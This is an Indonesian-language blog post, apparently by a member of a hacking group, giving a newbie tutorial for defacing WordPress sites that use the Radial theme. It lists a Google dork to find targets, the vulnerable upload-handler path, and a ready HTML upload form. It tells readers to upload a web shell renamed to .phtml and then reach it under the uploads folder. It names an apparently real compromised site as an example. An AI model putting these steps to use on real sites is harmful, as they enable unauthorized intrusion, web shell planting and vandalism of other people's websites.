Deface Wordpress Themes Radial

Siang fanss :) Siang juga haters :P Ketemu lagi sama gw, admin yg paling tamvan :P :P
Okee, kali ini gw mau share Tutorial Deface Wordpress Themes Radial. Master - master lewat aja ya, ini buat Newbie kek gw :)



Bahan :

1. Dork
inurl:/wp-content/themes/radial-themes
Kembanging biar dapet yg Vuln + Perawan :p

2. CSRF
<form enctype="multipart/form-data"action="site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

3. Exploit
/wp-content/themes/radial-theme/functions/upload-handler.php
4. Shell atau Script Deface
       Belum punya? Nih, Script Deface sederhana gw, COMOT

Langkah - Langkah :
1. Dorking ke Google .

2. Pilih sala satu site.

3. Masukin exploit   
/wp-content/themes/radial-theme/functions/upload-handler.php 
Contoh:
 http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php

4. Kalo vuln bakal ada tulisan 'error'

5. Masukin site ke CSRF.
    Contoh:
<form enctype="multipart/form-data"action="http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>

6. Upload file lu. Kalo mau upload shell, rename dulu jadi .phtml (contoh: shell.phtml)

7. Kalo sukses, akan keluar nama file lu.

8. File akses?
site.com/wp-content/uploads/tahun/bulan/namafile
Contoh:
http://www.jhttcars.be/wp-content/uploads/2017/01/berandal.txt

Kalo masih belom paham, liat video di bawah :)

 

Sekian tutorial gw kali ini, kalo ada pertanyaan, kontak gw aja dibawah :)

Regards, 
Berandal, [OWL SQUAD]

2 Comments

Komentar Spam Akan kami Hapus

Post a Comment

Komentar Spam Akan kami Hapus

Post a Comment

Previous Post Next Post